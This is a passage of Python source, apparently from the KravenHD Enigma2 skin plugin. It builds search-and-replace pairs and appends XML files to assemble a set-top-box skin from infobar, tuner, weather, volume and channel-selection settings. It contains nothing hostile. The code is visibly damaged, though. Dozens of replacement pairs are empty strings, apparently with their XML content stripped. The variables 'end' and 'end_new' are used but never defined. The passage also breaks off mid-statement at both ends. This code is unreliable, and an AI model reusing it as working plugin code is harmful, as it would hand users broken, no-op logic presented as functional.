config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### MediaPortal IB style\n\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/plugin.py\") and config.plugins.KravenHD.MediaPortal.value == \"mediaportal\":\n\t\t\tif config.plugins.KravenHD.IBColor.value == \"all-screens\":\n\t\t\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Tuner\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\", \"infobar-style-x2\", \"infobar-style-z1\", \"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\n\t\t\t### Tuner Colors\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenTunerBusy\" value=\"#00CCCC00', 'name=\"KravenTunerBusy\" value=\"#00' + config.plugins.KravenHD.TunerBusy.value])\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenTunerLive\" value=\"#0000B400', 'name=\"KravenTunerLive\" value=\"#00' + config.plugins.KravenHD.TunerLive.value])\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenTunerRecord\" value=\"#00FF0C00', 'name=\"KravenTunerRecord\" value=\"#00' + config.plugins.KravenHD.TunerRecord.value])\n\t\t\tself.skinSearchAndReplace.append(['name=\"KravenTunerXtremeBusy\" value=\"#001BA1E2', 'name=\"KravenTunerXtremeBusy\" value=\"#00' + config.plugins.KravenHD.TunerXtremeBusy.value])\n\n\t\t\t### Show unused Tuners\n\t\t\tif config.plugins.KravenHD.ShowUnusedTuner.value == \"none\":\n\t\t\t\tself.skinSearchAndReplace.append([',ShowUnused', ''])\n\n\t\t\t### Set align for Tuners\n\t\t\tif not config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-x1\":\n\t\t\t\tself.skinSearchAndReplace.append([',RightAlign2', ''])\n\t\t\t\tself.skinSearchAndReplace.append([',RightAlign4', ''])\n\t\t\t\tself.skinSearchAndReplace.append([',RightAlign8', ''])\n\n\t\t### SecondInfobar Textsize\n\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tHSize_list = [270, 300, 330, 390, 450]\n\t\t\tEventNowLineHeight = 30\n\t\telse:\n\t\t\tHSize_list = [405, 450, 495, 585, 675]\n\t\t\tEventNowLineHeight = 45\n\n\t\tfor i in HSize_list:\n\t\t\tHSize_old = str(i)\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\"):\n\t\t\t\tHSize_new = str(i - EventNowLineHeight)\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz1\", \"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\t\tHSize_new = str(i - (EventNowLineHeight * 2))\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-zzz1\":\n\t\t\t\tHSize_new = str(i - (EventNowLineHeight * 4))\n\t\t\telse:\n\t\t\t\tHSize_new = str(i)\n\n\t\t\tself.skinSearchAndReplace.append([',' + HSize_old + '\" name=\"KravenEventNowHeight\"', ',' + HSize_new + '\"'])\n\n\t\t### Clock Analog Color\n\t\tif self.actClockstyle == \"clock-analog\":\n\t\t\tself.changeColor(\"analogclock\", \"analogclock\", config.plugins.KravenHD.AnalogColor.value, None)\n\n\t\t### Horizontal Menu Icon\n\t\tself.makeHorMenupng(config.plugins.KravenHD.MainmenuHorIconColor.value, self.skincolorbackgroundcolor)\n\n\t\t### Screennames\n\t\tif config.plugins.KravenHD.DebugNames.value == \"screennames-on\":\n\t\t\tbegin = ''\n\n\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\tbegin_new = ''\n\t\t\telse:\n\t\t\t\tbegin_new = ''\n\n\t\t\tself.skinSearchAndReplace.append([begin, begin_new])\n\t\t\tself.skinSearchAndReplace.append([end, end_new])\n\n\t\t### KravenIconVPosition\n\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tVPos_list = [23, 680, 687, 690, 692]\n\t\telse:\n\t\t\tVPos_list = [34, 1020, 1030, 1035, 1038]\n\n\t\tfor i in VPos_list:\n\t\t\tVPos_old = str(i)\n\t\t\tif config.plugins.KravenHD.KravenIconVPosition.value == \"vposition-3\":\n\t\t\t\tVPos_new = str(i -3)\n\t\t\telif config.plugins.KravenHD.KravenIconVPosition.value == \"vposition-2\":\n\t\t\t\tVPos_new = str(i -2)\n\t\t\telif config.plugins.KravenHD.KravenIconVPosition.value == \"vposition-1\":\n\t\t\t\tVPos_new = str(i -1)\n\t\t\telif config.plugins.KravenHD.KravenIconVPosition.value == \"vposition0\":\n\t\t\t\tVPos_new = str(i)\n\t\t\telif config.plugins.KravenHD.KravenIconVPosition.value == \"vposition+1\":\n\t\t\t\tVPos_new = str(i +1)\n\t\t\telif config.plugins.KravenHD.KravenIconVPosition.value == \"vposition+2\":\n\t\t\t\tVPos_new = str(i +2)\n\t\t\telif config.plugins.KravenHD.KravenIconVPosition.value == \"vposition+3\":\n\t\t\t\tVPos_new = str(i +3)\n\n\t\t\tself.skinSearchAndReplace.append([',' + VPos_old + '\" name=\"KravenIconVPosition\"', ',' + VPos_new + '\"'])\n\n\t\t### delete Font-Shadow if Channelname is inside the box\n\t\tif config.plugins.KravenHD.IBStyle.value == \"box\" and config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\", \"infobar-style-zzz1\"):\n\t\t\tself.skinSearchAndReplace.append(['backgroundColor=\"KravenNamebg\"', 'backgroundColor=\"KravenIBbg\"'])\n\n\t\t### Infobar - ecm-info\n\t\tif config.plugins.KravenHD.FTA.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['FTAVisible', 'FTAInvisible'])\n\n\t\tif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-x1\":\n\t\t\tself.skinSearchAndReplace.append(['ShortReader', '' + config.plugins.KravenHD.ECMLine1.value])\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\tself.skinSearchAndReplace.append(['ShortReader', '' + config.plugins.KravenHD.ECMLine2.value])\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz1\", \"infobar-style-zz2\", \"infobar-style-zz3\", \"infobar-style-zzz1\"):\n\t\t\tself.skinSearchAndReplace.append(['ShortReader', '' + config.plugins.KravenHD.ECMLine3.value])\n\n\t\t### Infobar typewriter effect\n\t\tif config.plugins.KravenHD.TypeWriter.value == \"runningtext\":\n\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\tself.skinSearchAndReplace.append(['render=\"KravenHDEmptyEpg\"', 'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',' + config.plugins.KravenHD.RunningTextSpeed.value + ',wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['render=\"KravenHDEmptyEpg\"', 'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',' + config.plugins.KravenHD.RunningTextSpeed2.value + ',wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\telif config.plugins.KravenHD.TypeWriter.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['render=\"KravenHDEmptyEpg\"', 'render=\"KravenHDEmptyEpg2\"'])\n\n\t\t### Header begin\n\t\tself.appendSkinFile(self.data + \"header-begin.xml\")\n\n\t\t### Selection Border\n\t\tif config.plugins.KravenHD.SelectionStyle.value == \"color\" and not config.plugins.KravenHD.SelectionBorderList.value == \"none\":\n\t\t\tself.appendSkinFile(self.data + \"selectionborder.xml\")\n\t\t\tself.makeborsetpng(config.plugins.KravenHD.SelectionBorder.value)\n\n\t\t### Header end\n\t\tself.appendSkinFile(self.data + \"header-end.xml\")\n\n\t\t### Templates xml\n\t\tself.appendSkinFile(self.data + 'templates-main.xml')\n\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/MediaPortal/plugin.py\") and config.plugins.KravenHD.MediaPortal.value == \"mediaportal\":\n\t\t\tself.appendSkinFile(self.data + 'templates-mediaportal.xml')\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\"):\n\t\t\tself.appendSkinFile(self.data + 'templates-' + config.plugins.KravenHD.InfobarStyle.value + '.xml')\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\tself.appendSkinFile(self.data + 'templates-infobar-style-x2-x3-z1-z2.xml')\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\tself.appendSkinFile(self.data + 'templates-infobar-style-zz1-zzz1.xml')\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\tself.appendSkinFile(self.data + 'templates-infobar-style-zz2-zz3.xml')\n\n\t\t### ChannelSelection - horizontal RunningText\n\t\tif not self.BoxName == \"solo2\":\n\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\tif config.plugins.KravenHD.RunningTextSpeed.value == \"steptime=200\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['render=\"RunningTextEmptyEpg2\"', 'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',steptime=66,wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed.value == \"steptime=100\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['render=\"RunningTextEmptyEpg2\"', 'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',steptime=33,wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed.value == \"steptime=66\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['render=\"RunningTextEmptyEpg2\"', 'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',steptime=22,wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed.value == \"steptime=50\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['render=\"RunningTextEmptyEpg2\"', 'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',steptime=17,wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\t\telse:\n\t\t\t\tif config.plugins.KravenHD.RunningTextSpeed2.value == \"steptime=200\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['render=\"RunningTextEmptyEpg2\"', 'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',steptime=66,wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed2.value == \"steptime=100\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['render=\"RunningTextEmptyEpg2\"', 'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',steptime=33,wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed2.value == \"steptime=50\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['render=\"RunningTextEmptyEpg2\"', 'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',steptime=17,wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\t\t\telif config.plugins.KravenHD.RunningTextSpeed2.value == \"steptime=33\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['render=\"RunningTextEmptyEpg2\"', 'render=\"KravenHDRunningText\" options=\"movetype=running,startpoint=0,' + config.plugins.KravenHD.RunningText.value + ',steptime=11,wrap=0,always=0,repeat=2,oneshot=1\"'])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['render=\"RunningTextEmptyEpg2\"', 'render=\"KravenHDEmptyEpg2\"'])\n\n\t\t### ChannelSelection\n\t\tconfig.usage.servicelist_mode.value = \"standard\"\n\t\tconfig.usage.servicelist_mode.save()\n\t\tif self.actChannelselectionstyle in (\"channelselection-style-nopicon\", \"channelselection-style-nopicon2\", \"channelselection-style-xpicon\", \"channelselection-style-zpicon\", \"channelselection-style-zzpicon\", \"channelselection-style-zzzpicon\", \"channelselection-style-minitv3\", \"channelselection-style-nobile-minitv3\") or config.plugins.KravenHD.ChannelSelectionMode.value == \"zap\":\n\t\t\tconfig.usage.servicelistpreview_mode.value = False\n\t\telse:\n\t\t\tconfig.usage.servicelistpreview_mode.value = True\n\t\tconfig.usage.servicelistpreview_mode.save()\n\t\tif self.actChannelselectionstyle in (\"channelselection-style-minitv2\", \"channelselection-style-minitv22\"): #DualTV\n\t\t\tconfig.plugins.KravenHD.PigStyle.value = \"DualTV\"\n\t\t\tconfig.plugins.KravenHD.PigStyle.save()\n\t\telif self.actChannelselectionstyle in (\"channelselection-style-minitv33\", \"channelselection-style-nobile-minitv33\"): #ExtPreview\n\t\t\tconfig.plugins.KravenHD.PigStyle.value = \"ExtPreview\"\n\t\t\tconfig.plugins.KravenHD.PigStyle.save()\n\t\telif self.actChannelselectionstyle in (\"channelselection-style-minitv3\", \"channelselection-style-nobile-minitv3\"): #Preview\n\t\t\tconfig.plugins.KravenHD.PigStyle.value = \"Preview\"\n\t\t\tconfig.plugins.KravenHD.PigStyle.save()\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['render=\"KravenHDPig3\"', 'render=\"Pig\"'])\n\t\tself.appendSkinFile(self.data + self.actChannelselectionstyle + \".xml\")\n\n\t\t### Infobar Clock\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\"):\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Infobar Channelname\n\t\tif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-nopicon\" and not config.plugins.KravenHD.InfobarChannelName.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-x1\" and not config.plugins.KravenHD.InfobarChannelName.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\") and not config.plugins.KravenHD.InfobarChannelName.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-zz1\" and not config.plugins.KravenHD.InfobarChannelName.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\") and not config.plugins.KravenHD.InfobarChannelName2.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-zzz1\" and not config.plugins.KravenHD.InfobarChannelName2.value == \"none\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Infobar/SIB - ecm-info\n\t\tif config.plugins.KravenHD.ECMVisible.value in (\"ib\", \"ib+sib\"):\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-x1\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\tif config.plugins.KravenHD.ECMVisible.value in (\"sib\", \"ib+sib\"):\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-x1\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz2\", \"infobar-style-zz3\"):\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Infobar weather-style\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\", \"infobar-style-x3\", \"infobar-style-z2\", \"infobar-style-zz1\", \"infobar-style-zz2\", \"infobar-style-zz3\", \"infobar-style-zzz1\"):\n\t\t\tself.actWeatherstyle = config.plugins.KravenHD.WeatherStyle.value\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-z1\"):\n\t\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/Netatmo/plugin.py\"):\n\t\t\t\tself.actWeatherstyle = config.plugins.KravenHD.WeatherStyle3.value\n\t\t\telse:\n\t\t\t\tself.actWeatherstyle = config.plugins.KravenHD.WeatherStyle2.value\n\n\t\tif self.actWeatherstyle == \"weather-small\":\n\t\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\telif self.actWeatherstyle == \"weather-left\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\telif self.actWeatherstyle == \"weather-big\":\n\t\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\tif config.plugins.KravenHD.refreshInterval.value == \"0\":\n\t\t\tconfig.plugins.KravenHD.refreshInterval.value = config.plugins.KravenHD.refreshInterval.default\n\t\t\tconfig.plugins.KravenHD.refreshInterval.save()\n\n\t\t### Infobar system-info\n\t\tif not config.plugins.KravenHD.SystemInfo.value == \"none\":\n\t\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value == \"gradient\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telif config.plugins.KravenHD.InfobarBoxColor.value == \"texture\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Infobar\n\t\t# mainstyles\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telse:\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t# picon\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-x3\"):\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-z1\", \"infobar-style-z2\"):\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\tif config.plugins.KravenHD.ShowAgcSnr.value == \"on\":\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\telse:\n\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t# tuners / some icons / Infobox\n\t\tif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-nopicon\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\telif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-x1\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-z1\"):\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tself.actInfobox = ''\n\t\t\tif config.plugins.KravenHD.ShowAgcSnr.value == \"on\":\n\t\t\t\tself.actInfobox = config.plugins.KravenHD.Infobox2.value\n\t\t\telse:\n\t\t\t\tself.actInfobox = config.plugins.KravenHD.Infobox.value\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### SecondInfobar\n\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Players clockstyle\n\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\t### Volume\n\t\tself.skinSearchAndReplace.append(['', ''])\n\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\tif config.plugins.KravenHD.Volume.value == \"volume-left\":\n\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"Volume\" position=\"47,38\" size=\"330,80\"', 'screen name=\"Volume\" position=\"10,130\" size=\"28,360\"'])\n\t\t\telif config.plugins.KravenHD.Volume.value == \"volume-right\":\n\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"Volume\" position=\"47,38\" size=\"330,80\"', 'screen name=\"Volume\" position=\"1240,130\" size=\"28,360\"'])\n\t\t\telif config.plugins.KravenHD.Volume.value == \"volume-top\":\n\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"Volume\" position=\"47,38\" size=\"330,80\"', 'screen name=\"Volume\" position=\"center,25\" size=\"400,28\"'])\n\t\t\telif config.plugins.KravenHD.Volume.value == \"volume-center\":\n\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"Volume\" position=\"47,38\" size=\"330,80\"', 'screen name=\"Volume\" position=\"548,286\" size=\"184,184\"'])\n\t\telse:\n\t\t\tif config.plugins.KravenHD.Volume.value == \"volume-left\":\n\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"Volume\" position=\"70,57\" size=\"495,120\"', 'screen name=\"Volume\" position=\"15,195\" size=\"42,540\"'])\n\t\t\telif config.plugins.KravenHD.Volume.value == \"volume-right\":\n\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"Volume\" position=\"70,57\" size=\"495,120\"', 'screen name=\"Volume\" position=\"1860,195\" size=\"42,540\"'])\n\t\t\telif config.plugins.KravenHD.Volume.value == \"volume-top\":\n\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"Volume\" position=\"70,57\" size=\"495,120\"', 'screen name=\"Volume\" position=\"center,37\" size=\"600,42\"'])\n\t\t\telif config.plugins.KravenHD.Volume.value == \"volume-center\":\n\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"Volume\" position=\"70,57\" size=\"495,120\"', 'screen name=\"Volume\" position=\"868,448\" size=\"184,184\"'])\n\n\t\t### PVRState\n\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\tif config.plugins.KravenHD.InfobarBoxColor.value in (\"gradient\", \"texture\") and not config.plugins.KravenHD.PVRState.value == \"pvrstate-off\":\n\t\t\t\tif config.plugins.KravenHD.PVRState.value == \"pvrstate-center-big\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tif not config.plugins.KravenHD.InfobarBoxColor.value in (\"gradient\", \"texture\") and not config.plugins.KravenHD.PVRState.value == \"pvrstate-off\":\n\t\t\t\tif config.plugins.KravenHD.PVRState.value == \"pvrstate-center-big\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\telse:\n\t\t\tif not config.plugins.KravenHD.PVRState.value == \"pvrstate-off\":\n\t\t\t\tif config.plugins.KravenHD.PVRState.value == \"pvrstate-center-big\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\t\telse:\n\t\t\t\t\tself.skinSearchAndReplace.append(['', ''])\n\n\t\tif not config.plugins.KravenHD.PVRState.value == \"pvrstate-off\":\n\t\t\tself.skinSearchAndReplace.append(['', ''])\n\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\tif config.plugins.KravenHD.PVRState.value == \"pvrstate-center-big\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"PVRState\" position=\"0,0\" size=\"0,0\"', 'screen name=\"PVRState\" position=\"center,center\" size=\"220,90\"'])\n\t\t\t\telif config.plugins.KravenHD.PVRState.value == \"pvrstate-center-small\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"PVRState\" position=\"0,0\" size=\"0,0\"', 'screen name=\"PVRState\" position=\"center,center\" size=\"110,45\"'])\n\t\t\t\telif config.plugins.KravenHD.PVRState.value == \"pvrstate-left-small\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"PVRState\" position=\"0,0\" size=\"0,0\"', 'screen name=\"PVRState\" position=\"30,20\" size=\"110,45\"'])\n\t\t\telse:\n\t\t\t\tif config.plugins.KravenHD.PVRState.value == \"pvrstate-center-big\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"PVRState\" position=\"0,0\" size=\"0,0\"', 'screen name=\"PVRState\" position=\"center,center\" size=\"330,135\"'])\n\t\t\t\telif config.plugins.KravenHD.PVRState.value == \"pvrstate-center-small\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"PVRState\" position=\"0,0\" size=\"0,0\"', 'screen name=\"PVRState\" position=\"center,center\" size=\"165,67\"'])\n\t\t\t\telif config.plugins.KravenHD.PVRState.value == \"pvrstate-left-small\":\n\t\t\t\t\tself.skinSearchAndReplace.append(['screen name=\"PVRState\" position=\"0,0\" size=\"0,0\"', 'screen name=\"PVRState\" position=\"45,30\" size=\"165,67\"'])\n\n\t\t### Main XML\n\t\tself.appendSkinFile(self.data + \"main.xml\")\n\n\t\tif 